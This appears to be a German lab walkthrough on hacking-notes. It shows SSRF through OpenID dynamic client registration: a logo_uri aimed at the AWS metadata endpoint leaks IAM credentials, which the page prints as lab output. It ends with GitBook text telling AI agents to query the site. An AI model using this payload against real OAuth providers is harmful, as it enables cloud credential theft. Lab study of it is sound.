> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/oauth-authentication/ssrf-via-openid-dynamic-client-registration.md).

# SSRF über dynamische OpenID-Clientregistrierung

### SSRF über die dynamische OpenID-Clientregistrierung

**Lernziel**

Dieses Labor betreibt eine dynamische OpenID\*\*-Clientregistrierungsfunktion. Einige der vom Client bereitgestellten Daten werden vom OAuth-Dienst ungesichert verwendet, was die Tür zu einer **SSRF**.

Das Ziel ist es, diesen Fehler auszunutzen, um auf den folgenden internen Endpunkt zuzugreifen und das Geheimnis wiederherzustellen **Cloud-Zugriffsschlüssel** vom OAuth-Anbieter:

* `HTTP://169.254.169.254/latest/meta-data/iam/security-credentials/admin/`

**Erstzugriff**

Sie können sich mit einem Standardbenutzerkonto verbinden:

* **Kennung**: wiener
* **Passwort**: peter

**OpenID-Ermittlung**

Durch die Analyse des OAuth-Feeds identifizieren wir den Standard-Endpunkt der OpenID-Konfiguration:

```bash
/.well-known/openid-configuration
```

Diese Ressource stellt alle vom OAuth-Anbieter verwendeten Endpunkte bereit, einschließlich:

{% code overflow="wrap" %}

```json
{"authorization_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/auth","claims_parameter_supported":false,"claims_supported":["sub","name","email","email_verified","sid","auth_time","iss"],"code_challenge_methods_supported":["S256"],"end_session_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/session/end","grant_types_supported":["authorization_code","refresh_token"],"id_token_signing_alg_values_supported":["HS256","ES256","EdDSA","PS256","RS256"],"issuer":"https://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net","jwks_uri":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/jwks","registration_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/reg","response_modes_supported":["form_post","fragment","query"],"response_types_supported":["code"],"scopes_supported":["openid","offline_access","profile","email"],"subject_types_supported":["public"],"token_endpoint_auth_methods_supported":["none","client_secret_basic","client_secret_jwt","client_secret_post","private_key_jwt"],"token_endpoint_auth_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"token_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/token","request_object_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"request_parameter_supported":false,"request_uri_parameter_supported":true,"require_request_uri_registration":true,"userinfo_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/me","userinfo_signing_alg_values_supported":["HS256","ES256","EdDSA","PS256","RS256"],"introspection_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/token/introspection","introspection_endpoint_auth_methods_supported":["none","client_secret_basic","client_secret_jwt","client_secret_post","private_key_jwt"],"introspection_endpoint_auth_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"revocation_endpoint":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/token/revocation","revocation_endpoint_auth_methods_supported":["none","client_secret_basic","client_secret_jwt","client_secret_post","private_key_jwt"],"revocation_endpoint_auth_signing_alg_values_supported":["HS256","RS256","PS256","ES256","EdDSA"],"claim_types_supported":["normal"]}
```

{% endcode %}

* `Autorisierungsendpunkt`
* `Token-Endpunkt`
* `Userinfo-Endpunkt`
* **`Registrierungsendpunkt`**

Das Schlüsselfeld hier ist:

```
/reg
```

<figure><img src="/files/df23d2ca6c851d82f77a0da928f0fc6b5a021153" alt=""><figcaption></figcaption></figure>

Es ermöglicht die dynamische Registrierung neuer Kunden.

```http
{
    "application_type": "web",
    "redirect_uris": [
        "https://client-app.com/callback",
        "https://client-app.com/callback2"
        ],
    "client_name": "My Application",
    "logo_uri": "https://client-app.com/logo.png",
    "token_endpoint_auth_method": "client_secret_basic",
    "jwks_uri": "https://client-app.com/my_public_keys.jwks",
    "userinfo_encrypted_response_alg": "RSA1_5",
    "userinfo_encrypted_response_enc": "A128CBC-HS256",
    …
}
```

**OAuth-Clientregistrierung**

Eine Anfrage wird abgefangen zu `/reg` und in eine **POST** Anfrage mit dem Header umgewandelt:

```http
Content-Type: application/json
```

Ein minimaler Datensatz funktioniert mit einem sehr einfachen JSON:

```json
{
    "redirect_uris": [
        "https://test.com"
        ]
}
```

Der Server antwortet, indem er eine neue OAuth-Anwendung erstellt und insbesondere zurückgibt:

* `Client-ID`
* `Client-Geheimnis`
* `Registrierungs-Client-URI`
* `Registrierungszugriffstoken`

Dies bestätigt, dass die dynamische Registrierung aktiv und nicht einschränkend ist.

{% code overflow="wrap" %}

```json
{"application_type":"web","grant_types":["authorization_code"],"id_token_signed_response_alg":"RS256","post_logout_redirect_uris":[],"require_auth_time":false,"response_types":["code"],"subject_type":"public","token_endpoint_auth_method":"client_secret_basic","introspection_endpoint_auth_method":"client_secret_basic","revocation_endpoint_auth_method":"client_secret_basic","require_signed_request_object":false,"request_uris":[],"client_id_issued_at":1767127526,"client_id":"TL-B3vvYBc42Yju2-uZqV","client_secret_expires_at":0,"client_secret":"RVzHE-YNMkqwYdhd76jdL92wmVCNdV7Ir3z4QtEM3m2lptEEZJEbl-JxCuz7UogeAtpIFlxSqGp-GnHARBZBEQ","redirect_uris":["https://test.com"],"registration_client_uri":"http://oauth-0a7f007e03bb976780c306140235007f.oauth-server.net/reg/TL-B3vvYBc42Yju2-uZqV","registration_access_token":"On2Y_5DyRBtlz4QPmRbTogHoSp8ihSvLTC_ntt6c6Vz"}
```

{% endcode %}

<figure><img src="/files/e1ab6d69f72cc8605db1e9103033aaea9c01b225" alt=""><figcaption></figcaption></figure>

**SSRF-Injektion über `logo_uri`**

Das `logo_uri` Feld, das dafür vorgesehen ist, ein mit dem Client verknüpftes Bild zu laden, ist besonders interessant. / Es wird serverseitig ohne strikte URL-Validierung abgerufen.

Ein neuer Client wird mit einem `logo_uri` ausgewiesen, das auf die interne AWS-IP verweist:

```json
{
  "redirect_uris": [
    "https://jord4n.pro"
  ],
  "logo_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
}
```

Der Server akzeptiert die Anfrage und gibt einen neuen `Client-ID`.

**Zugriff auf das Kundenlogo**

Jeder Kunde hat einen Endpunkt, um sein Logo abzurufen:

```
GET /client/<client_id>/logo
```

<figure><img src="/files/6c6683a313cb4cd7ea29719f6a1d94f55fa4193a" alt=""><figcaption></figcaption></figure>

```http
GET /client/1767128152/logo
```

<figure><img src="/files/a9d1638c6b821b48186174ddb240628615419255" alt=""><figcaption></figcaption></figure>

Unter Verwendung der `Client-ID` zuvor erhalten:

```http
GET /client/4skHDyCgn9b1zvT-JBTin/logo
```

**Exfiltration von AWS-Metadaten**

Die Antwort enthält kein Bild, sondern direkt die \*\*internen IAM-Zugangsdaten\*\*:

```json
{
  "Code" : "Success",
  "LastUpdated" : "2025-12-31T18:55:47.398604832Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "TKrZh1liWrDBDSltdlG9",
  "SecretAccessKey" : "pY0oqQBOuKYc77nrZrFHriyySRf12bPnf4EyBTd0",
  "Token" : "nGndN1NnGYkE6XEumqF4iZiD7qqa1VyOXSm5T6I7VRolft4b6Hc2zppqjZJFIhPJH0ZhTAYfoUe8edUbDvDkLjd0idSJlJggjp6BZAjEOqsSFHAZ9qBXUur878LdUfxk12joCYbDYYcpw0y5tHNIHx7sqZaEUlv0tukYqgVXwjweiVr2aahtizQl58akErD0kFUdqEe0YDhWwRigaSAKGdDsMKNOK5SX8iwpK8Vq6mBy45Xkrx4Xt4ZC8XPn6ulX",
  "Expiration" : "2031-12-30T18:55:47.398604832Z"
}
```

`Geheimer Zugriffsschlüssel` ist der Wert, der zur Validierung des Labs erwartet wird.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/oauth-authentication/ssrf-via-openid-dynamic-client-registration.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
